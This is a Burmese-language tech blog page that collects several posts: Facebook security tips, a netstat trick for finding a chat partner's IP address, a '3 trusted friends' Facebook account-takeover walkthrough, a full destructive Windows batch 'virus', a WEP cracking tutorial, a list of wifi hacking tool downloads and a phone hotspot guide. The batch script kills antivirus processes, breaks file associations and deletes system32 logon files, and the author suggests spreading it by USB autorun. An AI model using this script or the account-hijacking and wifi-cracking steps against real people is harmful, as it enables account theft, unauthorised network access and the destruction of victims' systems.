ျမန္မာစာနဲ ့ေရးထားတဲ့ Password ကိုုသာ ေရးထည့္ျပီး ၀င္ၾကည့္ပါ)
Public Lan ဘဲျဖစ္ျဖစ္ Public WIFI ဘဲျဖစ္ျဖစ္သံုုးတဲ့လူေတြကေတာ့ VPN ကိုုသံုုးပါက မသာမွာသူက Sniffing လုုပ္တဲ့အခါ Packages ေတြ Session ေတြကိုု Hijacked မလုုပ္ႏိုုင္ပါ၊ ကဲ VPN ဘဲသံုုးၾကပါ တကယ္လိုု ့ သင္ဟာ သူမ်ား Public WIFI ကိုု သံုုးလွ်င္၊
Private က လူေတြကိုု ဟက္ခံရျပီဆုုိရင္ေတာ့ အဲဒီလူဟာ EXE သိုု ့မဟုုတ္ ကြန္ျပဳတာထဲကုုိ Download လုုပ္ျပီး သြင္းတဲ့ Malware တခုုခုုေၾကာင့္ ျဖစ္ႏုုိင္သလိုု Phishing link ကိုု သြားျပီး password ရိုုက္ေပးျပီး ၀င္မိတာတိုု ့ေၾကာင့္ ျဖစ္တတ္ပါတယ္၊
Facebook မွာ ေနာက္တခုုက Download မလုုပ္ဘဲခံရတတ္ကေတာ့ Facebook App ပါ။ ေပါက္တတ္ကရ Facebook App ေတြကိုု Account နဲ ့ Link လုုပ္ျခင္းျဖင့္ ခံရတတ္ပါတယ္၊ တခါတေလ ျမင္မွာပါ Spam ေတြ ကိုုယ္မတင္ဘဲ ကုုိယ္အစားတင္ေပးတဲ့ Post ေတြ… post ေအာက္ဘက္မွာ ေတြ ့မွာပါ Via this app name ဆိုုတာေတြ။ မသိတဲ့လူေတြကေတာ့ သူမ်ား လုုပ္တိုုင္း App ေတြသြင္းလွ်င္ ကိုုယ္လည္းသြင္းလုုပ္လွ်င္ သူမ်ားခံသလိုု ကိုုယ္လည္းခံရတတ္ပါတယ္၊ App ေတြကိုု ဒီေနရာမွ Remove လုုပ္ႏိုုင္ပါတယ္ http://www.facebook.com/settings?tab=applications ။ ယံုုၾကည္ရတဲ့ App ကိုု သံုုးရင္ေတာ့ ဘာမွမျဖစ္ဘူးေပါ့ဗ်ာ၊ တကယ္လိုု ့ App က Spam လုုပ္ျပီဆိုုလွ်င္ အဲဒီ App ကိုု Report လုုပ္ျပီး Remove လုုပ္ထားလိုုက္ပါ၊
ေနာက္တခုုကေတာ့ သူငယ္ခ်င္း ၃ ေယာက္နည္းပါဘဲ၊ လူေတြ လာလာ အပ္တိုုင္း ကုုိယ့္ဟာကိုုယ္ နာမည္ၾကီးေနျပီလိုု ့ မထင္ပါနဲ ့ ။ ကိုုယ့္ကိုု လူတိုုင္းသိေနျပီလိုု ့ မထင္ပါနဲ ့၊ ကိုုယ့္ကိုုယ္အျမင္ကတ္လိုု ့ အလြတ္ဆံုုးနည္းလမ္းျဖင့္ လာေရာက္ Friend request လုုပ္ျပီးေနာက္ စကားေျပာဟန္ေဆာင္ျပီးလုုပ္က Password reset ခ်ႏိုုင္တယ္ဆိုုတာ သတိျပဳပါ၊ ဒါေပမယ့္ အျမဲတမ္း Online မွာ တက္ေနတဲ့ သူေတြအတြက္ ဘာမွ မျဖစ္ႏိုုင္ပါ၊ ျပီးေတာ့ Account အတြက္ Security Question ကိုု ခ်ထားသူမ်ားအတြက္ ပိုုျပီးေကာင္းပါတယ္၊ ဘာျဖစ္လိုု ့လဲဆိုုေတာ့ Security Question က Password recovery လုပ္တဲ့အခါအရင္ေမးတတ္ပါတယ္၊ တကယ္လိုု ့ ပထမဆံုုးသူတိုု ့ Security Question မမွန္ကန္ပါက သူတိုု ့ Three Friends Steps ကိုု သြားခြင့္မေပးပါဘူး။ Security Question Disable ျဖစ္မွသြားမွသာ Three Friends Selection ကိုု ရႏုုိင္မွာျဖစ္ပါတယ္၊ Three Friends Selection ကိုု ရသြားရင္ေတာင္ ၂၄ နာရီလံုုးလံုုး အခ်ိန္ေစာင့္ေနရမွာျဖစ္ပါတယ္၊
EXE ေတြ File ေတြ ျပီးေတာ့ Phishing Link ေတြကိုု မသာမွာသူမ်ားက လာေရာက္ေျပာဆိုုသြားတာကိုု ယံုုၾကည့္လိုု ့ လုုပ္မိသူမ်ားသာ ခံရတတ္ပါတယ္၊
ရွင္းရွင္း ေျပာရလွ်င္ ဟိုုမရ ဒီမရေကာင္ေလးေတြ ဘာမွန္းမသိ Hacking ကိုုိလုုပ္ေနတယ္ဆိုုသူေတြက အမ်ားၾကီး အဲဒီေနရာမွာ ခံရျမဲပါ၊ သာမန္လူနဲ ့ အဲဒီလိုုလူ ႏွစ္ေယာက္ကိုု ဟက္မယ္ဆိုုရင္ဟိုုမက် ဒီမက် Hacking ဆိုုတဲ့ စကားေျပာေနတဲ့ေကာင္ေလးကိုု အရင္ဟက္လိုု ့ရႏိုုင္ပါတယ္၊
ဘာျဖစ္လုုိ ့လဲဆိုုေတာ့ အဲလိုုလူေတြကိုု အယံုုသတ္ရတာ လြယ္သလိုု .. ေဟ့ဒီမွာ ဟိုုဟာကိုု Hack လိုု ့ရတဲ့ Tools ကိုု သံုုးၾကည့္ပါလားဆိုုျပီး ထိုုးထည့္လိုုက္ရင္ သူ ့တိုု ့ကေတာ့ ကုုိယ့္ဟာကိုု ဆရာၾကီးလိုု လုုပ္ျပီး Fake Ware ကိုု သြားျပီး Download လုုပ္ျပီး ဖြင့္ၾကည့္ပါက ခံရတတ္ျမဲပါ၊ သာမန္လူမွာက အဲလိုုဟာမ်ဳိးေတြက မလိုုတာ၊ ဘာလုုပ္မွာလဲ အခ်ိန္ကုုန္ခံျပီးေတာ့ေလ၊
ကဲ သူမ်ားေတြ ဘာေပးေပး သတိနဲ ့ ေနရင္ ဘာမွမျဖစ္ပါဘူး (ေအးေအးဆဲဆဲေနမယ္) ဆိုုရင္ ဘာမွမျဖစ္ပါဘူး၊ ကိုုယ္မသိတဲ့လူက ပိုု ့လိုု္က္တဲ့ Email ေတြမွာ ပါတဲ့ File ေတြကိုု ျပီးေတာ့ Offical site မဟုတ္ဘဲ file shared မွာ Download ရမယ့္ Link ေတြကိုု ဆိုုရင္ သတိထားပါ၊ သူမ်ား Tools ေတြ Software ေတြ လာေပးပါက Official site Link ကိုုေတာင္းပါ၊ မေပးႏိုုင္လွ်င္ Fakeware (malware) ျဖစ္ပါတယ္။ Tools EXE files ေတြ လာေပးပါက နာမည္ေမးပါ… ဘယ္ဟာလဲ.. ဘာလုုပ္တာလဲ… ျပီးေတာ့ Google မွာ ရွာလွ်င္ အဲဒီဟာက ဘာလုုပ္တာလဲ ဆိုုတာ သိႏိုုင္ပါတယ္၊
Facebook ကိုု Secure လုုပ္ခ်င္လွ်င္ http://facebook.com/hacked ကိုု သြားလိုုက္ပါ။ ျပီးလွ်င္ Step By Step Facebook လုုပ္ခိုုင္းအတိုုင္း Password/Security Question ခ်လိုုက္ပါ၊
ျပီးေတာ့ လူတိုုင္းက Password တစ္ခုုတည္းကိုု ေနရာတုုိင္းတြင္ သံုုးေလ့ရွိပါတယ္၊ အဲသလိုုမ်ဳိး ထားတာ မေကာင္းပါဘူး။ တခုုခံရလွ်င္ ေနာက္တခုုလည္း တပါတည္း ခံရတတ္ပါတယ္၊ အဲဒါေၾကာင့္ တခုုနဲ ့ တခုုထားတဲ့ ဟာေတြ ကိုု မတူပါေစနဲ ့၊
ေနာက္ဆံုုးပိတ္အေနႏွင့္ ေျပာရလွ်င္ ရိုုးရိုုးေလးသာ Facebook ကိုု သံုုးလွ်င္ ဘာမွမျဖစ္ႏိုုင္ပါဘူး၊(အေကာင့္ဟက္ခံရတာ ေျပာတာပါ)၊ အေကာင့္ Report ခံရလိုု ့ ပိတ္သြားလ်ွင္ တာကေတာ့ တမ်ဳးိေပါ့ဗ်ာ၊

  • credit to  Bug Lab :P

အျပည့္အစံု

Facebook မွ တဆင့္ တစ္စံုတစ္ေယာက္ ရဲ ့IP address ကို သိလိုလွ်င္



-မိမိ ip သိလိုသူကို chat box မွာ chatting လုပ္ေနပါ
-အဲ့ဒီ အခ်ိန္ တစ္ျပိဳက္နက္တည္းမွာ window ရဲ ့
cmd (command promp) ကို သြားပါ ။
-cmd ကိုေရာက္လွ်င္ netstat ဆိုတဲ ့ command ကိုရိုက္ထည့္ပါ။
အဲ့ဒါဆိုရင္ေတာ့ မိမိ သိလိုသူ ရဲ ့IP လိပ္စာကို ရရွိမွာျဖစ္ပါတယ္။

အထက္ပါအဆင့္ကိုလုပ္ေဆာင္ရာတြင္ အထူးသတိျပဳရမွာကေတာ့
browser က history and cache ေတြကို ရွင္းလင္းထားဖို ့လိုအပ္ျပီး တစ္ျခား အသံုးျပဳေနတဲ ့tab ေတြကို ပိတ္ထားျပီး facebook chat ေနတဲ ့ tab တစ္ခုပဲဖြင့္ထားရမွာျဖစ္ပါတယ္။

အားလံုးအဆင္ေျပၾကပါေစ။

credit to Al Pha Vanishing

အျပည့္အစံု

3 trusted friendsျဖင့္ Facebook အေကာင့္ယူနည္း ႏွင့္ ကာကြယ္နည္း



အခုေျပာျပမယ့္လမ္းကေတာ့ လူတိုင္းသတိမထာမိတဲ့အခ်က္ေတြပါ သတိျပဳမိတဲ့သူေတြလည္ရွိမွာပါ မရွိတဲ့သူေတာ့ ေတာ္ေတာ္မ်ားပါတယ္ က်ေနာ္ေတြ႕သမွ်ေတာ့ ေတာ္ေတာ္မ်ားတယ္ ဒါေပမယ့္လည္ သြာမေျပာရဲဘူး ေတာ္ၾကာကိုယ္ေျပာၿပီးမွ သူ႕အေကာင့္တစ္ခုုခုျဖစ္တယ္ဆို ျပသနာရွာမွာဆိုလို႕။ က်ေနာ္ေတြ႕သမွ်
ထဲက သံဃာေတာ္ေတြပိုင္းတဲ့အေကာင့္ေတြေလာက္ပဲ သတိေပးေျပာပါတယ္.ကိုယ္ေတြအခ်င္းခ်င္းေတာ့မေျပာရဲလို႕ အခုလိုပိုစ့္ေလးတင္ျဖစ္သြာတာပါ ေအာက္မွာေလ့လာၾကပါ





အထက္ပါပံုအတိုင္း က်ေနာ္တို႕ ျပစ္မွတ္ရဲ႕ေဖ့ဘုတ္အေကာင့္က About ကိုႏွိပ္ၿပီးဝင္လုိက္ပါမယ္ Contact Info မွာ အေကာင့္ကိုဖြင့္ထာတဲ့ Email ကိုဖြတ္ေပးမယ့္
ေဖ့ဘုတ္ေမလ္ကိုေတာ့မဖြက္ထာတဲ့အတြက္ အဲဒီပံုမွာပါတဲ့အတိုင္း အဲဒီေမလ္နဲ႕အေကာင့္ကိုယူပါမယ္..ပံုမွာပါတဲ့ေမလ္ကို Copyကူးယူလိုက္ပါ..ထို႕ေနာက္

အဆင့္-1


Facebook – Browser ထဲကို ဝင္လိုက္ၿပီးေနာက္ အထက္ပါပံုအတိုင္း Email or Phone ဆိုတဲ့ Box မွာ ေစာေစာက ကူးယူလာတဲ့ေဖ့ဘုတ္ေမလ္ကိုျဖည့္လိုက္ပါမယ္
ထို႕ေနာက္ Forgot your password? ဆိုတာကိုႏွိပ္လိုက္ပါ။


အဆင့္-2


Email, phone or Facebook username ဆိုၿပီးအထက္ပါပံုအတို္င္း ေပၚလာပါတယ္။Email, phone or Facebook username ဆိုတဲ့ Boxမွာ ေစာေစာက ကူးယူလာတဲ့ေဖ့ဘုတ္ေမလ္ကိုျဖည့္လိုက္ပါ ..ျဖည့္ၿပီးပါက Search ဆိုတာကိုႏွိပ္ပါက က်ေနာ္တို႕လိုျခင္းေနတဲ့ ေဖ့ဘုတ္အေကာင့္ေပၚလာပါမယ္။


အဆင့္-3
 

အထက္ပါပံုအတိုင္း သင့္အေကာင့္လားလို႔ဆိုၿပီးေမးလာပါမယ္.. အဲဒီမွာပါတဲ့ Yes , This is my account ကိုႏွိပ္ေပးလိုက္ပါ


အဆင့္-4


အထက္ပါပံုအတိုင္း Pasword ျပန္ rest လုပ္မလားလို႔ ေမးပါလိမ့္မယ္ ခဏေနအုန္ ဘာမွမႏွိပ္ပါနဲ႔။ အေရးႀကီးတဲ့ အပိုင္းစလာပါၿပီး က်ေနာ္တို႕ ရယူမို႕ႀကိဳစားေနတဲ့ ဒီအေကာင့္ကို အသံုးမျပဳတာ အေတာ္ၾကာေနတယ္ဆို I have on longer use this account ဆုိတာေပၚေနၿပီး။လက္ရွိအသံုးျပဳေနဆဲဆိုပါက No longer have access to these? ဆိုၿပီးေပၚေနပါမယ္ အခုက်ေနာ္ယူမယ့္အေကာင့္က သံုးေနဆဲအေကာင့္ပါ.အဲဒီေတာ့  No longer have access to these? ဆိုတာကိုႏွိပ္လိုက္ပါမယ္


အဆင့္-5


I have no longer use this account ကို ႏွိပ္လိုက္ၿပီးပါက အထက္ပါပံုအတိုင္း
Please enter an email address that you know you can access. We'll use this address to send you messages about recovering your account.
ဆိုၿပီးေတာ့ boxထပ္က်လာပါမယ္အဲဒီမွာ  email address  ျဖည့္စြက္ရမယ့္ေမလ္က Facebook အေကာင့္ လံုးဝမဖြင့္ရေသးတဲ့ ေမလ္အသစ္ျဖစ္ရပါမယ္.အဲဒီမွာပံုအတိုင္း
ေမလ္ကိုႏွစ္ၿကိမ္းျဖည့္ရပါမယ္သို႕ေသာ္ က်ေနာ္တို႕ျဖည့္လိုက္တဲ့ေမလ္ကို ေဖ့ဘုတ္ကေန ေမလ္ပို႕လာမွာမဟုတ္ပါဘူး ဘာျဖစ္လို႕လည္ဆိုေတာ့  Security layerေၾကာင့္ပါ။
ကယ္က်ေနာ္တို႕ေမလ္အသစ္ျဖည့္ၿပီးပါက Continue ဆိုတာကိုႏွိပ္လိုက္ပါမယ္..။


အဆင့္-6


 အထက္ပါပံုကေတာ့ ဒီအေကာင့္ကို ရယူရန္အတြက္လုပ္ေဆာင္ရမယ့္အဆင့္ကိုျပထာပါ..ထို႕ေနာက္ Continue ဆိုတာကိုပဲ ဆက္ႏွိပ္ပါ


အဆင့္-7
 
စပါၿပီး 3 trusted friends အစီစဥ္က်ေနာ္တို႕ရယူမယ့္  Facebook အေကာင့္ထဲက 3 trusted friends ေရြးရပါေတာ့မယ္ အဲဒီအေကာင့္ထဲမွာ က်ေနာ္တို႕အေနနဲ႕
3 trusted friends အစီစဥ္ေအာင္ျမင္ေအာင္ အေကာင့္ေတြႀကိဳတင္အက္ထာၿပီးေတာ့ အဲဒီထဲက က်ေနာ္တို႕ အက္ထာတဲ့အေကာင့္3ခုကိုေရြးလိုက္ပါမယ္
အေကာင့္3ခုေရြးၿပီးပါက Continueဆိုတာကိုႏွိပ္ပါ..(မွတ္ခ်က္-အေကာင့္တစ္ခုေရြးၿပီးတိုင္Continueဆိုတာကိုႏွိပ္ပါ)


အဆင့္-8

အထက္ပါပံုအတိုင္း သူငယ္ခ်င္း3ေယာက္ေရြးၿပီးပါက Send Codes to Friends ဆိုတာကိုႏွိပ္လို္က္ပါ..။


အဆင့္-9


အထက္ပါပံုအတိုင္း က်ေနာ္တို႕ေရြးခ်ယ္လိုက္တဲ့ အေကာင့္3ခုကို ကုဒ္ေတြပို႕လာပါမယ္ အဲဒီကုဒ္ေတြကို ျဖည့္ၿပီးပါက  Submit Condes ဆိုတာကိုႏွိပ္ပါက.။
အဲဒီအဆင့္ၿပီးတာနဲ႕ -က်ေနာ္တို႕ရယူမယ့္အေကာင့္ကို Recover လုပ္ရပါၿပီး..။

ဒီလိုအရမ္းလြယ္ကူတဲ့ ဟက္နည္းလမ္းပါ ဘာTool မွမသံုးပဲ ဟက္သြားတာ ျဖစ္ပါတယ္။ဒီေလာက္လြယ္တာလည္ဆိုေတာ့ Security Question ကိုမခံထာလို႕ပါ တကယ္လို႕ Security Questionခံထာလည္ လြယ္တဲ့ Security Questionျပဳလုပ္ထာပါကလည္ ရယူသြာပါမည္။
က်ေနာ္တို႕အေနနဲ႕ အေကာင့္ယူလို႔မေအာင္ျမင္ရင္ေတာင္ အဲဒီအေကာင့္ေသခ်ာေပါက္ Lock က်ပါမယ္.အင္မတန္ ေၾကာက္စရာ ေကာင္းပါတယ္။


ကာကြယ္ရမယ့္အခ်က္ေတြကေတာ့

1-  Facebook ဖြင့္ထားတဲ့ Emailကို Only Me လုပ္ထာပါ။
2- Facebook ကေပးတဲ့  Emailကိုလည္ Only Me လုပ္ထာပါ
3- Security Question ကို ေလးေလးနက္နက္ျပဳလုပ္ထာပါ
4-ကိုယ့္မသိတဲ့ သူေတြလာအက္ရင္လက္မခံမို႕ပါ

Security Question ကို ျပီးျပီးေရာဆုိျပီး အလြယ္တကူေတြထားေတာ့ ရယူမယ့္သူက ေအးေဆယူသြာမွာေပါ့။ Security Question ေလးေလးနက္နက္ျပဳလုပ္ထားရင္ အေကာင့္ဟက္ခံရျခင္းမွစိတ္ခ်ရပါမယ္။


အဓိကသတိေပးျခင္းတာကေတာ့ Security Questionေလးေလးနက္နက္ျပဳလုပ္ထာပါလို႕အႀကံျပဳျခင္းပါတယ္။


အခုပိုစ့္ေလးကို မိတ္ေဆြ သူငယ္ခ်င္းအခ်င္းခ်င္း အေကာင့္ ေပ်ာက္ဆံုးျခင္းမရွိေစရန္ လက္ဆင့္ကမ္းမွ်ေဝးေပးပါရန္ တိုတ္တြန္းလိုက္ပါသည္။ by ေဖ့ဘုတ္ဆိုင္ရာ နည္းပညာမ်ား

အျပည့္အစံု

Saturday 15 December 2012

Stanford တကၠသိုလ္မွာ သင္တဲ့ C++ Programming ေလ့က်င့္ခန္း CD (Video က်ဴတိုရီရယ္)

 



စတန္းဖို႔လ္ တကၠသိုလ္မွာ သင္ေပးတဲ့ C++ : Programming ဗီဒီယို က်ဴတိုရီရယ္ CD ေတြပါ အရမ္းေကာင္းပါတယ္ ရွယ္ေပးမယ္လုပ္ေနတာေတာ့ ၾကာပါျပီ မရွယ္ျဖစ္ဘူးျဖစ္ေနတယ္
C++ : Programming ေလ့လာေနသူမ်ားအတြက္ေတာ့ အရမ္း အဖိုးတန္မွာပါ အခုမွ စေလ့လာမယ္ ဆိုသူမ်ားလဲ အသံုးတည့္ပါတယ္ စတန္းဖို႔လ္ တကၠသိုလ္မတက္ႏိုင္ေပမယ့္ သူတို႔ဆီက သင္ေပးတာ ေလ့လာႏိုင္လဲ ပညာပဲ မဟုတ္လားဗ်ာ ဒီေတာ့ ေဒါင္းလိုက္ဦးေပါ့










ျပီးျပီေနာ္ ဒါေဒါင္းျပီးရင္

အျပည့္အစံု

ကိုယ္ပိုင္ဗိုင္းရက္စ္ေရးၾကမယ္

Notepadနဲ႕ cmdသံုးျပီးေတာ့ ဗ်ာ ၀င္းဒိုး XP ကို စုတ္ျပတ္သတ္သြားေအာင္ ေမႊလိုက္ရေအာင္ ကဲေအာက္က codeေလးေတြကို ေသခ်ာၾကည္႕ Notepadေလးဖြင့္ျပီး လိုက္ေရးေပါ့

title Hack Setup
color 0A
@echo off
set end=md "Hack installing"
set fin=copy "Hack log.txt" "Installing"
%end%
%fin%
net send * Hack is installing, press OK to begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls
msg * It is you who is hacked....
msg * I warned you, and you kept going. Challenge me and this is what happens.
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
cls
shutdown

titleတို႕@echo off တို႕က ခုေခာတ္ ကေလးေပါက္စေတာင္ သိေနေတာ့ေျပာရင္
ေစာ္ကားရာၾကမယ္ ဒီေတာ့မရွင္းေတာ့ဘူးေနာ္. . . ။
အဲရွင္းျပမယ္သာေျပာတာပါ အခုနကုဒ္ေတြက အကုန္သိၾကပါတယ္ . .။
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
ဒီဟာေတြကိုေျပာျပမယ္ဗ်ာ ဒီလို
၀င္းဒိုးရဲ႕အဓိက processေတြကိုend task လုပ္ဖို႕ေရးတာဗ်
အဲဒါဆိုexplorerၾကသြားလိမ့္မယ္ဗ်ာ . .

cls ကေတာ့သိတဲ့အတိုင္းေလ ေနာက္ေၾကာင္းရွင္ဖို႕ေပါ့ . . . ။
assoc .exe=txtfile
assoc .txt=mp3file
ဒါကေတာ့ .exe fleနဲ႕.txtဖိုင္ေတြဖြင့္မရေအာင္လုပ္တဲ့ကြန္႕မန္႕ေပါ့ဗ်ာ
တခ်ား extentionေတြလဲထည္႕သံုးလို႕ရတယ္ဗ်ာ.

msg * It is you who is hacked....
msg * I warned you, and you kept going. Challenge me and this is what happens.
အဲဒိေနရာမွာ

ကိုေရးခ်င္္တဲ့စာကိုျပင္ေရးဗ် msg *အေနာက္မွ englishလုိပဲေနာ္
comment boxေလးနဲ႕တက္လာလိမ္မယ္. . .
ေအာက္ဆံုးကဟာကအေတာ္ေလးဆိုးတယ္ဗ်. . .
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
အဲဒိဟာက shutdown တို႕log onတို႕ ကိုျဖက္ျပစ္တာ
အဲဒိအတြက္သင့္ကြန္ျပဴတာက ရွက္ေဒါင္းခ်လို႕မရေတာ့ဘူး
log onကိုျဖက္ျပီး ျပီျဖစ္တဲ့အတြက္ resetလုပ္လိုက္ ရင္ ၀င္းဒိုးျပန္မတက္ေတာ့ဘူး
ကဲဘယ္လိုလုပ္မလဲ. . . .။
ဒါဆိုရင္အေတာ္ေလးနိပ္ျပီေနာ္ အဲဒိကုဒ္ေတြကို notpadမွာေရးျပီးရင္
.cmd ဒါမွမဟုတ္ .bat နဲ႕safe ဒါဆို ဗိုင္းရက္စ္တစ္ေကာင္ရျပီ
auto run fileေလးလုပ္ စတစ္ေလးထဲထည္႕
သူငယ္ခ်င္းကိုေပး . . အဲလိုေတာ့လုပ္ပါနဲ႕ဗ်ာ . . .
ဗိုင္းရပ္စ္ဆိုတာေကာင္းတဲ့အေကာင္မွမဟုတ္ပဲ
စမ္းၾကည္႕ဖို႕ပဲေနာ္
မေသခ်ာရင္မလုပ္ၾကနဲေနာ္ေတာ္ၾကာဆားဗစ္ေရာက္ေနဦး မယ္ . . .

အျပည့္အစံု

How to Hack / Crack a WiFi Network In Windows ?



How to Hack a WiFi Network In Windows?
ခဏခဏေမးတတ္ၾကတဲ့ wifi ဟက္နည္းပါ တစ္ခုေတာ့ သိထားပါ မဟက္ခင္ စစ္ရင္ေပၚတယ္ဆိုတာ ကိုေတာ့ ေခါင္းထဲ အရင္ထည့္ထားပါ စစ္ၾကည့္ရင္သိပါတယ္ ေဖာက္တာကေတာ့ေဖာက္လို႔ ရတယ္ ေဖာက္တဲ့ Tools ေတြလဲ တင္ထားေပးတာရွိပါတယ္ အရင္ကေဖာက္နည္းတစ္ခု ကိုလဲ တင္ထားေပးခဲ့ ျပီးျဖစ္သလို ေဖာက္ေနတဲ့သူေတြကို ျပန္စစ္မယ့္ေဆာ့၀ဲလ္ကို လဲ တင္ထားေပးဖူးပါတယ္ ကဲ အခု ဘယ္သူရယ္လို႔ နာမည္မတပ္ေတာ့ပါဘူး ေမးထားတာ အမ်ားဆံုးေမးခြန္းမို႔လို႔ပါ တစ္ခါတေလလဲ ေတြးမိပါတယ္ အေခ်ာင္လိုက္ခ်င္သူေတြ ဒီေလာက္ေတာင္ေပါသလားလို႔ ေျပာရင္ေတာ့ျဖင့္ ပညာရပ္ကိုတတ္ခ်င္လို႔ပါ လို႔ေတာ့ေျပာတာပဲ တကယ္တန္း ဒီလို မဟုတ္တာကိုေတာ့ ကိုယ္တိုင္သိၾကပါလိမ့္မယ္

tools ႏွစ္ခုကို အသံုးျပဳျပီး လုပ္ၾကည့္ၾကေပါ့ေနာ္ :
1. Commview for WiFi : 
2. Aircrack-Ng GUI :
ဒီမွာ Tools ေတြ ေဒါင္းပါ

1.Aircrack-NG GUI

Get it from here

2.Commview for Wifi

Get it from here
Step 1 :  CommView ကို Install လုပ္ပါ   VoIP mode နဲ႔ Standard mode 2မ်ိဳးမွာ  VoIP ကို အသံုးျပအဳျပီးလုပ္ပါမယ္. လိုအပ္တဲ့  drivers ေတြကို အလိုလို အင္စေတာလုပ္ပါလိမ့္မယ္ခြင့္ျပဳေပးလိုက္ပါ.

Step 2 :ေအာက္မွာ ျပထားသလို   PLAY ပံုေလးကို ကလစ္ေပးပါ
 
Step 3 : ( Networkေရြးခ်ယ္ခ်င္း (a) ) : START SCANNING button ေလးကို ကလစ္ေပးပါ
Step 4 : (Networkေရြးခ်ယ္ခ်င္း (b) ) : Click on the  ညာဘက္ Coulumn မွုုာ hack ခ်င္တဲ့ WiFi network ကို ကလစ္ေပးပါ ေနာက္  CAPTURE ဆိုတာကို ကလစ္ေပးပါ

Note :- ဒီ tutorial  ေလးက WEP protected networks ေတြ အတြက္ပါေနာ္ေမ့ေနလို႔
Step 5 : (Capturing the Packets) :started Capturing Packets
 
Step 6 : (Saving the Packets ) : အခု Packets မ်ားကို ေဆ့လုပ္ဖို႔ လိုပါတယ္
Click on Settings->Options->Memory Usage Change Maximum Packets 20000 ပဲရိုက္ပါ
 
  LOGGING Tab ကိုကလစ္ပါ
AUTO-SAVING ကို Check  လုပ္ပါ
  Maximum Directory မွာ Size ကို  : 5000 ထည့္ေပးပါ
Average Log File Size မွာ : 50 ထည့္ေပးပါ
specified directory မွာ .ncp format အေနျဖင့္ 20MB နဲ႔ packets ေတြကို  အလိုလိုသိမ္းထားပါလိမ့္မယ္
Step 7 : ( Concatenating the Logs ) :
  .ncf file .ဖိုင္တစ္ခု၇လာပါျပီ
Step 8 : (Converting .ncf to .cap ) : ရလာတဲ့  packets ေတြကို ဖိုင္ေဖာ့မက္ေျပာင္းပစ္ဖို႔  .cap file အျဖစ္ေျပာင္းဖို႔ အတြက္ AIRCRACK နဲ႔  crackလုပ္ရပါမယ္

Click on File->Log Viewer->Load Commview Logs-> Choose the .ncf file. Now File->Export->Wireshark/TCP dump format ဒီအတိုင္းေလးပါ

Aircrack Part :

ဒုတိယ အပိုင္းကေတာ့ရိုးရွင္းပါတယ္.  Aircrack Folder->Bin->Aircrack-ng GUI.exe Choose the .cap file and you should be able to do the others 
ကိုယ့္အရည္အခ်င္းအေပၚမူတည္ျပီးလုပ္ရမရ ဆိုတာ ကြာသြားပါလိမ့္မယ္ ဘာျဖစ္တယ္ညာျဖစ္တယ္ေတာ့ ျပန္လာ မေအာ္ပါနဲ႔ တင္ေပးပါဆိုလို႔ တင္ေပးလိုက္တာ ေက်းဇူးတင္ပါတယ္ အာကာျဖိဳး

အျပည့္အစံု

အေကာင္းဆံုး wifi hack tools မ်ား

Best WiFi Hack Tools
အေကာင္းဆံုး wifi hack tools မ်ားကို စုစည္းတင္ျပေပးလိုက္ပါတယ္ ေလာေလာဆယ္ ကြန္ အဆင္ေမေျပေသးလို႔ www.4shared.com 
ကေန တင္ေပးလိုက္ပါတယ္ လိုခ်င္သူမ်ား အဆင္ေျပပါေစဗ်ာ
- Comm View for WiFi v5.2484
- Pure NetWorks NetWork Magic 2
- Air
- AP Sniff
- Comm View
- Aerosol
- Easy WiFi Radar
- Boingo Wireless
- and more ....


Hacks page 2:
- Get Wep Key Of Encrypted Wireless Connection
- WiFi Companion v2.10.4
- Net Stumbler
- WiFi Hack Tools
- WiFi Internet Access Blocker
- iPig WiFi HotSpot VPN Security


Hacks page 3:
- Hot Spotter v0.4
- Kismet
- WDG
- AirShort v0.2.7e
- WiFi Hopper v1.2
- Wireless NetWork Ignition
- Wepwedgie - alpha
- Wep Hacking


Plus e-Books:
- O-Reilly Wireless Hacks
- System Hacking 2k
- FBI Teaches how to break WiFi
- Collection of Hacking Dictionary
- How to Hack WEP


Download Now(akarphyoe.co.nr)
 
ေရးသားသူ - အာကာၿဖိဳး (နည္းပညာ)

အျပည့္အစံု

မိုဘုိင္းဖုန္းမွ တျခား Computer, MobilePhone,Tablet မ်ားသုိ႔ အင္တာနက္ ရွယ္ယာ လုပ္နည္း



အင္တာနက္ ရရွိတဲ့ ဖုန္းကေနျပီးေတာ့ Wi-Fi hotspot တစ္ခု တည္ေဆာက္ေပးျပီး ကြန္ပ်ဴတာ၊ မိုဘုိင္းဖုန္းနဲ႔ Tablet ေတြမွာ အေရအတြက္ ရွစ္လံုးအထိ အင္တာနက္ မွ်ေ၀ အသုံးျပဳႏိုင္ပါတယ္။ 
 
အင္တာနက္လိုင္း ရတဲ့ မိုဘုိင္းဖုန္းရဲ႕ အင္တာနက္ ကြန္နက္ရွင္ကို On ေပးပါ။
 Wi-Fi hotspot တစ္ခု တည္ေဆာက္မွာမို႔ ဖုန္းရဲ႕ Settings ကို အရင္ဖြင့္ပါ။ Wireless & networks ကိုရွာျပီး select လုပ္ပါ။ ကြန္နက္ရွင္ကို Share ေပးမွာမို႔ Tethering & portable hotspot ကို ေရြးေပးပါ။ Portable WLAN hotspot ကို ေတြ႔ရင္ေတာ့ check box မွာ အမွန္ျခစ္ျပီး Portable WLAN hotspot settings ထဲသုိ႔ ၀င္လုိက္ပါ။
 အျခား devices မ်ားႏွင့္ ခ်ိတ္ဆက္မွာျဖစ္တဲ့အတြက္ေၾကာင့္ကိုယ့္ ကြန္နက္ရွင္ လံုျခံဳစိတ္ခ်ရေစဖို႔အတြက္ Configure WLAN hotspot ထဲကို ၀င္ျပီး Security Password ေပးရပါမယ္။
 
Configure WLAN hotspot ထဲမွာ Network SSID, Security, Password ဆိုတဲ့ tabs သုံးခုကို ေတြ႔ရမယ္။
Network SSID မွာ စိတ္ၾကိဳက္ SSID Name ေပးလို႔ ရတယ္။ 
 Security ထဲမွာေတာ့ WPA2 PSK ကို ေရြးေပးလိုက္ပါ။ 
